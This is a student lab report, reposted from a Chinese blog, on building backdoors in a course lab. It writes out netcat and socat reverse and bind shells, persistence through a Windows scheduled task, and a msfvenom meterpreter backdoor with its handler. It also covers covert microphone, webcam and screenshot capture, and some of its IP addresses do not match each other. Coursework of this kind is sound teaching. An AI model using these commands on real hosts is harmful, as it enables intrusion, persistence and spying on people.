2017-2018-2 20155309南皓芯《网络对抗技术》Exp2 后门原理与实践

本文详细介绍了一种使用netcat和socat获取远程主机Shell的方法,并演示了如何利用MSFmeterpreter生成可执行文件来获取目标主机的Shell。此外,还介绍了如何获取音频、摄像头等敏感信息及尝试提权。

实验要求

(1)使用netcat获取主机操作Shell,cron启动 (0.5分)

(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

实验内容

了解监听,对主机与客机有更深入的了解。

实验步骤

1.用nc或netcat获取远程主机的Shell

1.1.1 Windows获得Linux Shell

首先在windows下面打开监听

用ipconfig命令,找到自己的IP地址
192.168.234.129

1071511-20180328191426703-33869544.png

下载ncat并进入该目录,按windows + R组合键打开cmd.exe,输入ncat.exe -l -p 5309命令:

需要下载的netcat在老师提供的码云上

1071511-20180328194915960-1418116401.png

然后将其放在win7虚拟机下C盘即可

1071511-20180328201356626-1499408733.png

这时,防火墙会报警,这时为了实验的需求,我们要关闭所有的防火墙。

1071511-20180328201638781-509012839.jpg

我的防火墙实在windows defender下的防火墙

1071511-20180328202101842-499963957.png

1071511-20180328202239477-2105316565.png

2.Linux反弹连接Win,输入命令

nc 192.168.234.129 5309 -e /bin/sh

1071511-20180328203508655-1490312498.jpg

Windows下获得一个linux shell,可运行任何指令,如ls

1071511-20180328204011856-1690238559.jpg

1.2 Linux获得Win Shell

1.用ifconfig命令查看本机IP为
192.168.234.133

1071511-20180328205726854-1785127175.png

2.Linux运行监听指令,输入命令nc -l -p 5309

3.Windows反弹连接Linux,在ncat目录下输入命令
ncat.exe -e cmd.exe 192.168.234.133 5309

1071511-20180328210821326-1186569739.png

这样我们就可以随意查看文件了。
1071511-20180328211132346-1551752079.png

(2)使用socat获取主机操作Shell,

首先我们了解一下什么是socat

socat是一个多功能的网络工具,名字来由是“Socket CAT”,可以看作是netcat的N倍加强版

1.在Windows 7中打开开始菜单,搜索管理工具并打开

1071511-20180328212020631-45855355.png

找到任务计划程序并打开,点击创建任务:

1071511-20180328212218215-1405253298.png

1071511-20180328212533442-386366561.png

击触发器选项卡,选择新建,然后将开始任务设置为工作站锁定时

1071511-20180328213005479-1922549243.png

点击常规选项卡,输入名称(学号)

1071511-20180328213132641-1942342587.jpg

再点击操作选项卡,点击新建,程序或脚本中选择socat.exe路径,在添加参数一栏中写
tcp-listen:5309 exec:cmd.exe,pty,stderr
(作用是把cmd.exe绑定到端口5314,同时把cmd.exe的stderr重定向到stdout上),点击确定保存设置:

1071511-20180328221341829-2016960021.jpg

1071511-20180328221525867-1758464620.jpg

点击右栏中的显示所有正在运行的任务,找到刚刚创建的20155309任务,右键点击运行,此时会弹出一个黑色的框框表明成功运行:

1071511-20180328223922250-1901808239.jpg

在Kali Linux中输入socat - tcp:192.168.234.134 :5309
命令,可以成功得到一个cmd shell:

2 Meterpreter

使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

这个实验使用的IP地址还是win7的
192.168.234.129

在kali中输入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.234.129 LPORT=5321 -f exe > 20155309_backdoor.exe

可以看到虚拟机显示这样的画面

1071511-20180329075149462-375805116.jpg

通过nc指令将生成的后门程序传送到Windows主机上

1071511-20180329122443840-1178630001.jpg

2.2 MSF打开监听进程

在Kali Linux中输入msfconsole命令:

1071511-20180329080255018-1196774725.jpg

每次输入msfconcole都有新体验

1071511-20180329080445568-971440970.jpg

1071511-20180329080726157-1565189081.jpg

再依次输入以下命令:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.234.134

set LPORT 5309

show options

exploit

1071511-20180329081125192-798861412.jpg

1071511-20180329081858086-1786336945.png

注意:
IP地址选取的是kali虚拟机的。

接下来我们就可以做监听了。
要注意关闭win7的防火墙
1071511-20180329120606121-723869987.png

Win平台ncat目录下找到后门并双击运行20155309_backdoor.exe:

1071511-20180329122644775-547463366.png
然后我们就获取到了shellcode
1071511-20180401085827916-422398323.jpg

使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

使用record_mic指令可以截获一段音频:

1071511-20180401090132398-1326339772.png

使用webcam_snap指令可以使用摄像头进行拍照

1071511-20180401090341931-1272122505.png

色相头打开失败。

利用screenshot可以进行截屏。

实验过程中遇到的问题

1.无法进行监听

将网络设置改成桥接。

实验心得与体会

这次的实验算是这几个学期以来包括所有课最好玩的实验了。虽然可能之前基础比较差,但是现在也改变了自己原来的看法,想要去学习,想要去独立完成实验。反正想要去改变总是好的,浪子回头金不换,

转载于:https://www.cnblogs.com/nhx19970709/p/8685652.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值